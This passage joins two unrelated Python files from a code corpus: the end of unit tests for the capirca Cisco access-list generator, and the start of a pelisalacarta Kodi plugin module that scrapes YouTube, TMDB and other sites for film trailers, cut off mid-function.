BAD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 2001 standard
}
"""
BAD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco 101 standard
}
"""
BAD_HEADER = """
header {
comment:: "this is a test acl"
target:: juniper test-filter
}
"""
BAD_HEADER_2 = """
header {
target:: cisco 1300
}
"""
GOOD_STANDARD_TERM_1 = """
term standard-term-1 {
address:: SOME_HOST
action:: accept
}
"""
GOOD_STANDARD_TERM_2 = """
term standard-term-2 {
address:: SOME_HOST
action:: accept
}
"""
BAD_STANDARD_TERM_1 = """
term bad-standard-term-1 {
destination-address:: SOME_HOST
protocol:: tcp
action:: accept
}
"""
UNSUPPORTED_TERM_1 = """
term protocol_except_term {
protocol-except:: tcp udp icmp
action:: reject
}
"""
UNSUPPORTED_TERM_2 = """
term protocol_except_term {
source-prefix:: configured-neighbors-only
action:: reject
}
"""
EXPIRED_TERM = """
term is_expired {
expiration:: 2001-01-01
action:: accept
}
"""
EXPIRING_TERM = """
term is_expiring {
expiration:: %s
action:: accept
}
"""
GOOD_TERM_1 = """
term good-term-1 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_2 = """
term good-term-2 {
protocol:: tcp
destination-address:: SOME_HOST
source-port:: HTTP
option:: established
action:: accept
}
"""
GOOD_TERM_3 = """
term good-term-3 {
protocol:: tcp
option:: tcp-established
action:: accept
}
"""
GOOD_TERM_4 = """
term good-term-4 {
protocol:: tcp
logging:: true
action:: accept
}
"""
GOOD_TERM_5 = """
term good-term-5 {
verbatim:: cisco "mary had a little lamb"
verbatim:: iptables "mary had second lamb"
verbatim:: juniper "mary had third lamb"
}
"""
GOOD_TERM_6 = """
term good-term-6 {
destination-address:: ANY
action:: accept
}
"""
GOOD_TERM_7 = """
term good-term {
protocol:: vrrp
action:: accept
}
"""
GOOD_TERM_8 = """
term good-term {
protocol:: tcp
destination-address:: SOME_HOST
action:: accept
}
"""
GOOD_TERM_9 = """
term good-term-9 {
protocol:: tcp udp
option:: established
action:: accept
}
"""
GOOD_TERM_10 = """
term good-term-10 {
protocol:: icmp
icmp-type:: echo-reply unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_11 = """
term good-term-11 {
protocol:: icmpv6
icmp-type:: echo-reply destination-unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_12 = """
term good-term-12 {
action:: accept
}
"""
GOOD_TERM_13 = """
term good-term-13 {
owner:: foo@google.com
action:: accept
}
"""
GOOD_TERM_14 = """
term good-term-14 {
protocol:: tcp
destination-address:: SOME_HOST
destination-port:: CONSECUTIVE_PORTS
action:: accept
}
"""
GOOD_TERM_15 = """
term good-term-15 {
protocol:: hopopt
action:: accept
}
"""
GOOD_TERM_16 = """
term good-term-16 {
protocol:: tcp
action:: accept
dscp-match:: 42
}
"""
GOOD_TERM_17 = """
term good-term-17 {
protocol:: tcp udp
policer:: batman
option:: established
action:: accept
}
"""
GOOD_TERM_18 = """
term good-term-18 {
source-address:: SOME_HOST
destination-address:: SOME_HOST
action:: accept
}
"""
LONG_COMMENT_TERM = """
term long-comment-term {
comment:: "%s "
action:: accept
}
"""
SUPPORTED_TOKENS = {
'action',
'address',
'comment',
'destination_address',
'destination_address_exclude',
'destination_port',
'dscp_match',
'expiration',
'icmp_type',
'logging',
'name',
'option',
'owner',
'platform',
'platform_exclude',
'protocol',
'source_address',
'source_address_exclude',
'source_port',
'translated',
'verbatim',
}
SUPPORTED_SUB_TOKENS = {
'action': {'accept', 'deny', 'reject', 'next',
'reject-with-tcp-rst'},
'icmp_type': {
'alternate-address',
'certification-path-advertisement',
'certification-path-solicitation',
'conversion-error',
'destination-unreachable',
'echo-reply',
'echo-request',
'mobile-redirect',
'home-agent-address-discovery-reply',
'home-agent-address-discovery-request',
'icmp-node-information-query',
'icmp-node-information-response',
'information-request',
'inverse-neighbor-discovery-advertisement',
'inverse-neighbor-discovery-solicitation',
'mask-reply',
'mask-request',
'information-reply',
'mobile-prefix-advertisement',
'mobile-prefix-solicitation',
'multicast-listener-done',
'multicast-listener-query',
'multicast-listener-report',
'multicast-router-advertisement',
'multicast-router-solicitation',
'multicast-router-termination',
'neighbor-advertisement',
'neighbor-solicit',
'packet-too-big',
'parameter-problem',
'redirect',
'redirect-message',
'router-advertisement',
'router-renumbering',
'router-solicit',
'router-solicitation',
'source-quench',
'time-exceeded',
'timestamp-reply',
'timestamp-request',
'unreachable',
'version-2-multicast-listener-report',
},
'option': {'established',
'tcp-established'}
}
# Print a info message when a term is set to expire in that many weeks.
# This is normally passed from command line.
EXP_INFO = 2
class CiscoTest(unittest.TestCase):
def setUp(self):
self.naming = mock.create_autospec(naming.Naming)
def testIPVersion(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('0.0.0.0/0'),
nacaddr.IP('::/0')]
pol = policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_6, self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
# check if we've got a v6 address in there.
self.failIf('::' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('ANY')
def testOptions(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['80']
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_2,
self.naming), EXP_INFO)
# this is a hacky sort of way to test that 'established' maps to HIGH_PORTS
# in the destination port section.
range_test = 'permit 6 any eq 80 10.0.0.0 0.255.255.255 range 1024 65535'
self.failUnless(range_test in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
self.naming.GetServiceByProto.assert_called_once_with('HTTP', 'tcp')
def testExpandingConsequtivePorts(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['80', '81']
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_14,
self.naming), EXP_INFO)
first_string = 'permit 6 any 10.0.0.0 0.255.255.255 eq 80'
second_string = 'permit 6 any 10.0.0.0 0.255.255.255 eq 81'
self.failUnless(first_string in str(acl), '[%s]' % str(acl))
self.failUnless(second_string in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
self.naming.GetServiceByProto.assert_called_once_with(
'CONSECUTIVE_PORTS', 'tcp')
def testDSCP(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_16,
self.naming), EXP_INFO)
self.failUnless(re.search('permit 6 any any dscp 42', str(acl)),
str(acl))
def testTermAndFilterName(self):
acl = cisco.Cisco(policy.ParsePolicy(
GOOD_HEADER + GOOD_TERM_1 + GOOD_TERM_6, self.naming), EXP_INFO)
self.failUnless('ip access-list extended test-filter' in str(acl), str(acl))
self.failUnless(' remark good-term-1' in str(acl), str(acl))
self.failUnless(' permit ip any any' in str(acl), str(acl))
def testRemark(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.1.1.1/32')]
# Extended ACLs should have extended remark style.
acl = cisco.Cisco(policy.ParsePolicy(
GOOD_EXTENDED_NUMBERED_HEADER + GOOD_TERM_1, self.naming), EXP_INFO)
self.failUnless('ip access-list extended 150' in str(acl), str(acl))
self.failUnless(' remark numbered extended' in str(acl), str(acl))
self.failIf('150 remark' in str(acl), str(acl))
# Extended ACLs should have extended remark style.
acl = cisco.Cisco(policy.ParsePolicy(
GOOD_STANDARD_NUMBERED_HEADER + GOOD_STANDARD_TERM_1, self.naming),
EXP_INFO)
self.failUnless('access-list 50 remark' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testTcpEstablished(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_3,
self.naming), EXP_INFO)
self.failUnless(re.search('permit 6 any any established\n',
str(acl)), str(acl))
def testLogging(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_4,
self.naming), EXP_INFO)
self.failUnless(re.search('permit 6 any any log\n',
str(acl)), str(acl))
def testVerbatimTerm(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_5,
self.naming), EXP_INFO)
self.failUnless('mary had a little lamb' in str(acl), str(acl))
# check if other platforms verbatim shows up in ouput
self.failIf('mary had a second lamb' in str(acl), str(acl))
self.failIf('mary had a third lamb' in str(acl), str(acl))
def testBadStandardTerm(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + BAD_STANDARD_TERM_1,
self.naming)
self.assertRaises(cisco.StandardAclTermError, cisco.Cisco, pol, EXP_INFO)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardTermHost(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.1.1.1/32')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_1,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
expected = 'access-list 99 permit 10.1.1.1'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardTermNet(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_2,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
expected = 'access-list 99 permit 10.0.0.0 0.255.255.255'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testNamedStandard(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_2 + GOOD_STANDARD_TERM_2,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
expected = 'ip access-list standard FOO'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
expected = ' permit 10.0.0.0 0.255.255.255'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testNoIPv6InOutput(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('2620:0:1000::/40')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_2,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
self.failIf('::' in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardFilterName(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(BAD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_2,
self.naming)
self.assertRaises(cisco.UnsupportedCiscoAccessListError,
cisco.Cisco, pol, EXP_INFO)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardFilterRange(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(BAD_STANDARD_HEADER_2 + GOOD_STANDARD_TERM_2,
self.naming)
self.assertRaises(cisco.UnsupportedCiscoAccessListError,
cisco.Cisco, pol, EXP_INFO)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testObjectGroup(self):
ip_grp = ['object-group network ipv4 SOME_HOST']
ip_grp.append(' 10.0.0.0/8')
ip_grp.append('exit')
port_grp1 = ['object-group port 80-80']
port_grp1.append(' eq 80')
port_grp1.append('exit')
port_grp2 = ['object-group port 1024-65535']
port_grp2.append(' range 1024 65535')
port_grp2.append('exit')
self.naming.GetNetAddr.return_value = [
nacaddr.IP('10.0.0.0/8', token='SOME_HOST')]
self.naming.GetServiceByProto.return_value = ['80']
pol = policy.ParsePolicy(
GOOD_OBJGRP_HEADER + GOOD_TERM_2 + GOOD_TERM_18, self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
self.failUnless('\n'.join(ip_grp) in str(acl), '%s %s' % (
'\n'.join(ip_grp), str(acl)))
self.failUnless('\n'.join(port_grp1) in str(acl), '%s %s' % (
'\n'.join(port_grp1), str(acl)))
self.failUnless('\n'.join(port_grp2) in str(acl), '%s %s' % (
'\n'.join(port_grp2), str(acl)))
# Object-group terms should use the object groups created.
self.failUnless(
' permit 6 any port-group 80-80 net-group SOME_HOST port-group'
' 1024-65535' in str(acl), str(acl))
self.failUnless(
' permit ip net-group SOME_HOST net-group SOME_HOST' in str(acl),
str(acl))
# There should be no addrgroups that look like IP addresses.
for addrgroup in re.findall(r'net-group ([a-f0-9.:/]+)', str(acl)):
self.assertRaises(ValueError, nacaddr.IP(addrgroup))
self.naming.GetNetAddr.assert_has_calls([mock.call('SOME_HOST'),
mock.call('SOME_HOST')])
self.naming.GetServiceByProto.assert_called_once_with('HTTP', 'tcp')
def testInet6(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8'),
nacaddr.IP('2001:4860:8000::/33')]
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_8,
self.naming), EXP_INFO)
inet6_test1 = 'no ipv6 access-list inet6_acl'
inet6_test2 = 'ipv6 access-list inet6_acl'
inet6_test3 = 'permit 6 any 2001:4860:8000::/33'
self.failUnless(inet6_test1 in str(acl), '[%s]' % str(acl))
self.failUnless(inet6_test2 in str(acl), '[%s]' % str(acl))
self.failUnless(re.search(inet6_test3, str(acl)), str(acl))
self.failIf('10.0.0.0' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testMixed(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8'),
nacaddr.IP('2001:4860:8000::/33')]
acl = cisco.Cisco(policy.ParsePolicy(GOOD_MIXED_HEADER + GOOD_TERM_8,
self.naming), EXP_INFO)
inet6_test1 = 'no ip access-list extended mixed_acl'
inet6_test2 = 'ip access-list extended mixed_acl'
inet6_test3 = 'permit 6 any 10.0.0.0 0.255.255.255'
inet6_test4 = 'no ipv6 access-list ipv6-mixed_acl'
inet6_test5 = 'ipv6 access-list ipv6-mixed_acl'
inet6_test6 = 'permit 6 any 2001:4860:8000::/33'
aclout = str(acl)
self.failUnless(inet6_test1 in aclout, '[%s]' % aclout)
self.failUnless(inet6_test2 in aclout, '[%s]' % aclout)
self.failUnless(re.search(inet6_test3, aclout), aclout)
self.failUnless(inet6_test4 in aclout, '[%s]' % aclout)
self.failUnless(inet6_test5 in aclout, '[%s]' % aclout)
self.failUnless(re.search(inet6_test6, aclout), aclout)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testDsmo(self):
addr_list = list()
for octet in range(0, 256):
net = nacaddr.IP('192.168.' + str(octet) + '.64/27')
addr_list.append(net)
self.naming.GetNetAddr.return_value = addr_list
acl = cisco.Cisco(policy.ParsePolicy(GOOD_DSMO_HEADER + GOOD_TERM_8,
self.naming), EXP_INFO)
self.assertIn('permit 6 any 192.168.0.64 0.0.255.31', str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testUdpEstablished(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_9,
self.naming), EXP_INFO)
self.failIf(re.search('permit 17 any any established',
str(acl)), str(acl))
def testIcmpTypes(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_10,
self.naming), EXP_INFO)
# echo-reply = 0
self.failUnless(re.search('permit 1 any any 0',
str(acl)), str(acl))
# unreachable = 3
self.failUnless(re.search('permit 1 any any 3',
str(acl)), str(acl))
# time-exceeded = 11
self.failUnless(re.search('permit 1 any any 11',
str(acl)), str(acl))
def testIpv6IcmpTypes(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_11,
self.naming), EXP_INFO)
# echo-reply = icmp-type code 129
self.failUnless(re.search('permit 58 any any 129',
str(acl)), str(acl))
# destination-unreachable = icmp-type code 1
self.failUnless(re.search('permit 58 any any 1',
str(acl)), str(acl))
# time-exceeded = icmp-type code 3
self.failUnless(re.search('permit 58 any any 3',
str(acl)), str(acl))
@mock.patch.object(cisco.logging, 'debug')
def testIcmpv6InetMismatch(self, mock_debug):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_11,
self.naming), EXP_INFO)
# output happens in __str_
str(acl)
mock_debug.assert_called_once_with(
'Term good-term-11 will not be rendered,'
' as it has [u\'icmpv6\'] match specified but '
'the ACL is of inet address family.')
@mock.patch.object(cisco.logging, 'debug')
def testIcmpInet6Mismatch(self, mock_debug):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_1,
self.naming), EXP_INFO)
# output happens in __str_
str(acl)
mock_debug.assert_called_once_with(
'Term good-term-1 will not be rendered,'
' as it has [u\'icmp\'] match specified but '
'the ACL is of inet6 address family.')
def testUnsupportedKeywordsError(self):
pol1 = policy.ParsePolicy(GOOD_HEADER + UNSUPPORTED_TERM_1, self.naming)
pol2 = policy.ParsePolicy(GOOD_HEADER + UNSUPPORTED_TERM_1, self.naming)
# protocol-except
self.assertRaises(aclgenerator.UnsupportedFilterError,
cisco.Cisco, pol1, EXP_INFO)
# source-prefix
self.assertRaises(aclgenerator.UnsupportedFilterError,
cisco.Cisco, pol2, EXP_INFO)
def testDefaultInet6Protocol(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_12,
self.naming), EXP_INFO)
self.failUnless(re.search('permit ipv6 any any', str(acl)), str(acl))
@mock.patch.object(cisco.logging, 'warn')
def testExpiredTerm(self, mock_warn):
_ = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + EXPIRED_TERM,
self.naming), EXP_INFO)
mock_warn.assert_called_once_with(
'WARNING: Term %s in policy %s is expired and will not '
'be rendered.', 'is_expired', 'test-filter')
@mock.patch.object(cisco.logging, 'info')
def testExpiringTerm(self, mock_info):
exp_date = datetime.date.today() + datetime.timedelta(weeks=EXP_INFO)
_ = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + EXPIRING_TERM %
exp_date.strftime('%Y-%m-%d'),
self.naming), EXP_INFO)
mock_info.assert_called_once_with(
'INFO: Term %s in policy %s expires in '
'less than two weeks.', 'is_expiring', 'test-filter')
def testTermHopByHop(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_15,
self.naming), EXP_INFO)
self.failUnless('permit hbh any any' in str(acl), str(acl))
def testOwnerTerm(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER +
GOOD_TERM_13, self.naming), EXP_INFO)
self.failUnless(re.search(' remark Owner: foo@google.com',
str(acl)), str(acl))
def testRemoveTrailingCommentWhitespace(self):
term = LONG_COMMENT_TERM%'a'*99
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + term,
self.naming), EXP_INFO)
def testBuildTokens(self):
pol1 = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_5,
self.naming), EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEquals(st, SUPPORTED_TOKENS)
self.assertEquals(sst, SUPPORTED_SUB_TOKENS)
def testBuildWarningTokens(self):
pol1 = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_17,
self.naming), EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEquals(st, SUPPORTED_TOKENS)
self.assertEquals(sst, SUPPORTED_SUB_TOKENS)
if __name__ == '__main__':
unittest.main()
|
ryantierney513/capirca
|
tests/lib/cisco_test.py
|
Python
|
apache-2.0
| 23,978 | 0.001877 |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta 4
# Copyright 2015 tvalacarta@gmail.com
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#
# Distributed under the terms of GNU General Public License v3 (GPLv3)
# http://www.gnu.org/licenses/gpl-3.0.html
# ------------------------------------------------------------
# This file is part of pelisalacarta 4.
#
# pelisalacarta 4 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pelisalacarta 4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pelisalacarta 4. If not, see <http://www.gnu.org/licenses/>.
# --------------------------------------------------------------------------------
# Search trailers from youtube, filmaffinity, abandomoviez, vimeo, etc...
# --------------------------------------------------------------------------------
import re
import urllib
import urlparse
from core import config
from core import jsontools
from core import logger
from core import scrapertools
from core import servertools
from core.item import Item
from platformcode import platformtools
result = None
window_select = []
# Para habilitar o no la opción de búsqueda manual
if config.get_platform() != "plex":
keyboard = True
else:
keyboard = False
def buscartrailer(item, trailers=[]):
logger.info()
# Lista de acciones si se ejecuta desde el menú contextual
if item.action == "manual_search" and item.contextual:
itemlist = manual_search(item)
item.contentTitle = itemlist[0].contentTitle
elif 'search' in item.action and item.contextual:
itemlist = globals()[item.action](item)
else:
# Se elimina la opción de Buscar Trailer del menú contextual para evitar redundancias
if type(item.context) is str and "buscar_trailer" in item.context:
item.context = item.context.replace("buscar_trailer", "")
elif type(item.context) is list and "buscar_trailer" in item.context:
item.context.remove("buscar_trailer")
item.text_color = ""
itemlist = []
if item.contentTitle != "":
item.contentTitle = item.contentTitle.strip()
elif keyboard:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = platformtools.dialog_input(default=fulltitle, heading="Introduce el título a buscar")
if item.contentTitle is None:
item.contentTitle = fulltitle
else:
item.contentTitle = item.contentTitle.strip()
else:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = fulltitle
item.year = item.infoLabels['year']
logger.info("Búsqueda: %s" % item.contentTitle)
logger.info("Año: %s" % item.year)
if item.infoLabels['trailer'] and not trailers:
url = item.infoLabels['trailer']
if "youtube" in url:
url = url.replace("embed/", "watch?v=")
titulo, url, server = servertools.findvideos(url)[0]
title = "Trailer por defecto [" + server + "]"
itemlist.append(item.clone(title=title, url=url, server=server, action="play"))
if item.show or item.infoLabels['tvshowtitle'] or item.contentType != "movie":
tipo = "tv"
else:
tipo = "movie"
try:
if not trailers:
itemlist.extend(tmdb_trailers(item, tipo))
else:
for trailer in trailers:
title = trailer['name'] + " [" + trailer['size'] + "p] (" + trailer['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=trailer['url'], server="youtube"))
except:
import traceback
logger.error(traceback.format_exc())
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda en Youtube", action="youtube_search",
text_color="green"))
itemlist.append(item.clone(title=title % "Búsqueda en Filmaffinity",
action="filmaffinity_search", text_color="green"))
# Si se trata de una serie, no se incluye la opción de buscar en Abandomoviez
if not item.show and not item.infoLabels['tvshowtitle']:
itemlist.append(item.clone(title=title % "Búsqueda en Abandomoviez",
action="abandomoviez_search", text_color="green"))
itemlist.append(item.clone(title=title % "Búsqueda en Jayhap (Youtube, Vimeo & Dailymotion)",
action="jayhap_search", text_color="green"))
if item.contextual:
global window_select, result
select = Select("DialogSelect.xml", config.get_runtime_path(), item=item, itemlist=itemlist, caption="Buscando: "+item.contentTitle)
window_select.append(select)
select.doModal()
if item.windowed:
return result, window_select
else:
return itemlist
def manual_search(item):
logger.info()
texto = platformtools.dialog_input(default=item.contentTitle, heading=config.get_localized_string(30112))
if texto is not None:
if item.extra == "abandomoviez":
return abandomoviez_search(item.clone(contentTitle=texto, page="", year=""))
elif item.extra == "youtube":
return youtube_search(item.clone(contentTitle=texto, page=""))
elif item.extra == "filmaffinity":
return filmaffinity_search(item.clone(contentTitle=texto, page="", year=""))
elif item.extra == "jayhap":
return jayhap_search(item.clone(contentTitle=texto))
def tmdb_trailers(item, tipo="movie"):
logger.info()
from core.tmdb import Tmdb
itemlist = []
tmdb_search = None
if item.infoLabels['tmdb_id']:
tmdb_search = Tmdb(id_Tmdb=item.infoLabels['tmdb_id'], tipo=tipo, idioma_busqueda='es')
elif item.infoLabels['year']:
tmdb_search = Tmdb(texto_buscado=item.contentTitle, tipo=tipo, year=item.infoLabels['year'])
if tmdb_search:
for result in tmdb_search.get_videos():
title = result['name'] + " [" + result['size'] + "p] (" + result['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=result['url'], server="youtube"))
return itemlist
def youtube_search(item):
logger.info()
itemlist = []
titulo = item.contentTitle
if item.extra != "youtube":
titulo += " trailer"
# Comprueba si es una búsqueda de cero o viene de la opción Siguiente
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
titulo = urllib.quote(titulo)
titulo = titulo.replace("%20", "+")
data = scrapertools.downloadpage("https://www.youtube.com/results?sp=EgIQAQ%253D%253D&q="+titulo)
data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
patron = '<span class="yt-thumb-simple">.*?(?:src="https://i.ytimg.com/|data-thumb="https://i.ytimg.com/)([^"]+)"' \
'.*?<h3 class="yt-lockup-title ">.*?<a href="([^"]+)".*?title="([^"]+)".*?' \
'</a><span class="accessible-description".*?>.*?(\d+:\d+)'
matches = scrapertools.find_multiple_matches(data, patron)
for scrapedthumbnail, scrapedurl, scrapedtitle, scrapedduration in matches:
scrapedthumbnail = urlparse.urljoin("https://i.ytimg.com/", scrapedthumbnail)
scrapedtitle = scrapedtitle.decode("utf-8")
scrapedtitle = scrapedtitle + " (" + scrapedduration + ")"
if item.contextual:
scrapedtitle = "[COLOR white]%s[/COLOR]" % scrapedtitle
url = urlparse.urljoin('https://www.youtube.com/', scrapedurl)
itemlist.append(item.clone(title=scrapedtitle, action="play", server="youtube", url=url,
thumbnail=scrapedthumbnail, text_color="white"))
next_page = scrapertools.find_single_match(data, '<a href="([^"]+)"[^>]+><span class="yt-uix-button-content">'
'Siguiente')
if next_page != "":
next_page = urlparse.urljoin("https://www.youtube.com", next_page)
itemlist.append(item.clone(title=">> Siguiente", action="youtube_search", extra="youtube", page=next_page,
thumbnail="", text_color=""))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados (%s)" % titulo,
action="", thumbnail="", text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Youtube", action="manual_search",
text_color="green", thumbnail="", extra="youtube"))
return itemlist
def abandomoviez_search(item):
logger.info()
# Comprueba si es una búsqueda de cero o viene de la opción Siguiente
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
titulo = item.contentTitle.decode('utf-8').encode('iso-8859-1')
post = urllib.urlencode({'query': titulo, 'searchby': '1', 'posicion': '1', 'orden': '1',
'anioin': item.year, 'anioout': item.year, 'orderby': '1'})
url = "http://www.abandomoviez.net/db/busca_titulo_advance.php"
item.prefix = "db/"
data = scrapertools.downloadpage(url, post=post)
if "No hemos encontrado ninguna" in data:
url = "http://www.abandomoviez.net/indie/busca_titulo_advance.php"
item.prefix = "indie/"
data = scrapertools.downloadpage(url, post=post).decode("iso-8859-1").encode('utf-8')
itemlist = []
patron = '(?:<td width="85"|<div class="col-md-2 col-sm-2 col-xs-3">).*?<img src="([^"]+)"' \
'.*?href="([^"]+)">(.*?)(?:<\/td>|<\/small>)'
matches = scrapertools.find_multiple_matches(data, patron)
# Si solo hay un resultado busca directamente los trailers, sino lista todos los resultados
if len(matches) == 1:
item.url = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, matches[0][1])
item.thumbnail = matches[0][0]
itemlist = search_links_abando(item)
elif len(matches) > 1:
for scrapedthumbnail, scrapedurl, scrapedtitle in matches:
scrapedurl = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, scrapedurl)
scrapedtitle = scrapertools.htmlclean(scrapedtitle)
itemlist.append(item.clone(title=scrapedtitle, action="search_links_abando",
url=scrapedurl, thumbnail=scrapedthumbnail, text_color="white"))
next_page = scrapertools.find_single_match(data, '<a href="([^"]+)">Siguiente')
if next_page != "":
next_page = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, next_page)
itemlist.append(item.clone(title=">> Siguiente", action="abandomoviez_search", page=next_page, thumbnail="",
text_color=""))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados", action="", thumbnail="",
text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Abandomoviez",
action="manual_search", thumbnail="", text_color="green", extra="abandomoviez"))
return itemlist
def search_links_abando(item):
logger.info()
data = scrapertools.downloadpage(item.url)
itemlist = []
if "Lo sentimos, no tenemos trailer" in data:
itemlist.append(item.clone(title="No hay ningún vídeo disponible", action="", text_color=""))
else:
if item.contextual:
progreso = platformtools.dialog_progress("Buscando en abandomoviez", "Cargando trailers...")
progreso.update(10)
i = 0
message = "Cargando trailers..."
patron = '<div class="col-md-3 col-xs-6"><a href="([^"]+)".*?' \
'Images/(\d+).gif.*?</div><small>(.*?)</small>'
matches = scrapertools.find_multiple_matches(data, patron)
if len(matches) == 0:
trailer_url = scrapertools.find_single_match(data, '<iframe.*?src="([^"]+)"')
if trailer_url != "":
trailer_url = trailer_url.replace("embed/", "watch?v=")
code = scrapertools.find_single_match(trailer_url, 'v=([A-z0-9\-_]+)')
